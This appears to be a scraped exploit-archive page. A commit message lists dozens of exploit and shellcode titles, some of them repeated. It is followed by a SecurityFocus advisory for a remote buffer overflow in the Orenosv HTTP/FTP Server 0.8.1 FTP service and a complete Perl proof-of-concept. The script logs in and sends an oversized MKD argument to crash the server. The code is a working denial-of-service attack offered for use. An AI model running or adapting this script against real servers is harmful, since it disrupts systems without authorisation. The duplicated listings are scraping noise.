880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
51 lines
No EOL
1.4 KiB
Perl
Executable file
51 lines
No EOL
1.4 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/13546/info
|
|
|
|
The FTP server shipped with Orenosv HTTP/FTP is prone to a remote buffer-overflow vulnerability.
|
|
|
|
This issue presents itself when the application handles excessive values supplied as filenames through various FTP commands.
|
|
|
|
A successful attack may corrupt memory, cause a denial of service, or execute arbitrary code.
|
|
|
|
Orenosv HTTP/FTP Server 0.8.1 is reportedly vulnerable; other versions may be affected as well.
|
|
|
|
#!/usr/bin/perl
|
|
use IO::Socket;
|
|
|
|
$target = shift || useage ();
|
|
$port = shift || useage ();
|
|
$user = shift || useage ();
|
|
$pass = shift || useage ();
|
|
|
|
print"[*] Connecting to $target on port $port\n";
|
|
my $sock = IO::Socket::INET -> new
|
|
(
|
|
Proto => 'tcp',
|
|
PeerAddr => $target,
|
|
PeerPort => $port
|
|
)or die ("Cannot Connect, Have you already DoSed It?\n");
|
|
print"[*] Connected, Logging In...\n";
|
|
sleep 3;
|
|
$sock -> send ("USER $user\r\n");
|
|
sleep 3;
|
|
$sock -> send ("PASS $pass\r\n");
|
|
while ($data = <$sock>)
|
|
{
|
|
if ($data =~ /230/)
|
|
{
|
|
print"[*] Logged In\n";
|
|
last;
|
|
}
|
|
}
|
|
print"[*] Creating 512-byte Buffer\n";
|
|
$buffer = 'A' x 512;
|
|
print"[*] Sending Exploit\n";
|
|
$sock -> send ("MKD $buffer\r\n");
|
|
print"[*] Exploit Sent\n";
|
|
exit;
|
|
|
|
sub useage ()
|
|
{
|
|
print "Useage: $0 <Host> <Port> <Username> <Password>\n";
|
|
exit;
|
|
}
|
|
#Coded By Samsta http://theshelljunkies.clawz.com |